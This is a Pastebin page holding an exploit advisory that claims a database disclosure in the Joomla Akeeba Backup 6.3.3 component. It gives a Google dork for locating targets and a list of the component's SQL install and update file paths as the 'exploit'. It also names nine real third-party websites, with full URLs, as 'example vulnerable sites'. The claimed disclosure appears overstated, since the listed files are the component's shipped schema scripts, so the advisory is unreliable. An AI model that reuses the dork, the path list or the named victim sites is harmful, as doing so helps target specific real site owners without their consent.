API tools faq
paste
KingSkrupellos

Joomla Akeeba Backup Components 6.3.3 Database Disclosure

KingSkrupellos
Jan 18th, 2019
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.41 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################################
  2.  
  3. # Exploit Title : Joomla Akeeba Backup Components 6.3.3 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 19/01/2019
  7. # Vendor Homepage : akeebabackup.com
  8. # Software Information Link : extensions.joomla.org/extension/akeeba-backup/
  9. # Software Download Link : akeebabackup.com/download/akeeba-backup/6-3-3/pkg_akeeba-6-3-3-core-zip.zip
  10. # Software Affected Version : 6.3.3
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/administrator/components/com_akeeba/''
  15. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  16. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  17. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  18.  
  19. ###################################################################################
  20.  
  21. # Description :
  22. **************
  23.  
  24. Akeeba Backup Core is the most widely used open-source backup component for the Joomla! CMS.
  25. Its mission is simple: create a site backup that can be restored on any Joomla!-capable server,
  26. making it ideal not only for backups but also for site transfers or even deploying sites to your
  27. clients' servers. Akeeba Backup creates a full backup of your site in a single archive.
  28. The archive contains all the files, a database snapshot and an installer similar in function
  29. to the standard Joomla! installer. The backup and restore process is AJAX powered
  30. to avoid server timeouts, even with huge sites. Alternatively, you can make a backup of
  31. only your database, or only your files. Akeeba Backup is the reliable, easy to use,
  32. open source backup solution for your Joomla! site.
  33.  
  34. ###################################################################################
  35.  
  36. # Database Disclosure Exploit :
  37. ***************************
  38. /administrator/components/com_akeeba/sql/common/mysql.xml
  39. /administrator/components/com_akeeba/sql/common/postgresql.xml
  40. /administrator/components/com_akeeba/sql/common/sqlsrv.xml
  41. /administrator/components/com_akeeba/sql/install/mysql/install.sql
  42. /administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
  43. /administrator/components/com_akeeba/sql/install/sqlazure/install.sql
  44. /administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  45. /administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
  46. /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  47. /administrator/components/com_akeeba/sql/updates/mysql/3.5.0-2012-03-27.sql
  48. /administrator/components/com_akeeba/sql/updates/mysql/3.6.0-2012-07-31.sql
  49. /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  50. /administrator/components/com_akeeba/sql/updates/sqlazure/3.5.0-2012-03-27.sql
  51. /administrator/components/com_akeeba/sql/updates/sqlazure/3.6.0-2012-07-31.sql
  52. /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-2012-03-27.sql
  53. /administrator/components/com_akeeba/sql/updates/sqlsrv/3.5.0-[YEAR]-[MONTH]-[DAY].sql
  54. /administrator/components/com_akeeba/sql/updates/sqlsrv/3.6.0-2012-07-31.sql
  55.  
  56. ###################################################################################
  57.  
  58. # Example Vulnerable Sites :
  59. *************************
  60.  
  61. [+] pentictonwebdesign.com/sites/stop/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  62.  
  63. [+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_akeeba/sql/install/mysql/uninstall.sql
  64.  
  65. [+] bainhotte.com/a%20sup/administrator/components/com_akeeba/sql/install/mysql/install.sql
  66.  
  67. [+] alsys.ma/administrator/components/com_akeeba/sql/install/sqlsrv/uninstall.sql
  68.  
  69. [+] farwestpizza.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  70.  
  71. [+] leschaumieresdekerguan.com/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  72.  
  73. [+] desertlearningcenter.org/joomla/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  74.  
  75. [+] staszickutno.pl/staszickutno.pl/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  76.  
  77. [+] prehisto.ch/administrator/components/com_akeeba/sql/install/sqlsrv/install.sql
  78.  
  79. ###################################################################################
  80.  
  81. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  82.  
  83. ###################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!